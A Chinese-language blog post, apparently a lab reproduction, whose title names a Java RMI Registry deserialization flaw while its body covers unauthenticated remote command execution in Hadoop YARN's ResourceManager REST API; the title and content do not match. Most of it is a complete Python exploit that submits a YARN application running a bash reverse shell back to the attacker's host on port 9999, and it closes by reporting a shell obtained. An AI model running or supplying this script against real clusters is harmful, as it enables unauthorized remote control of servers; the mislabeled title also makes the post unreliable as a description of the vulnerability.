新后端漏洞(上)- Java RMI Registry反序列化漏洞

漏洞介绍:

参考 http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf
漏洞环境:

docker 环境

docker-compose up -d

环境启动后,访问http://127.0.0.1:8088即可看到Hadoop YARN ResourceManager WebUI页面。

1、漏洞复现:

通过任务执行,利用过程如下:

1、在本地监听等待反弹 shell 连接

2、调用 New Application API 创建 Application

3、调用 Submit Application API 提交

python 复制代码
#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '192.168.108.131' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

成功获取shell

相关推荐
智界工具库28 分钟前
《IDEA 2025 长效使用指南:2099 年有效期配置实战之JetBrains全家桶有效》
java·ide·intellij-idea
Mr.456731 分钟前
MQTT通信实现方案(Spring Boot 3 集成MQTT)
java·spring boot·后端
徐子童39 分钟前
JVM高频面试题---类加载机制
java·jvm·面试题
青草地溪水旁1 小时前
设计模式(C++)详解——迭代器模式(2)
java·c++·设计模式·迭代器模式
9号达人1 小时前
Java18 新特性详解与实践
java·后端·面试
我不是混子1 小时前
java浮点数精度问题及解决方案
java·后端
花心蝴蝶.1 小时前
Java 中的代理模式
java·开发语言·代理模式
舒克起飞了2 小时前
设计模式——单例模式
java·单例模式·设计模式
Java&Develop2 小时前
GitLab-如何基于现有项目仓库,复制出新的项目仓库
java
一只乔哇噻2 小时前
java后端工程师进修ing(研一版‖day49)
java·开发语言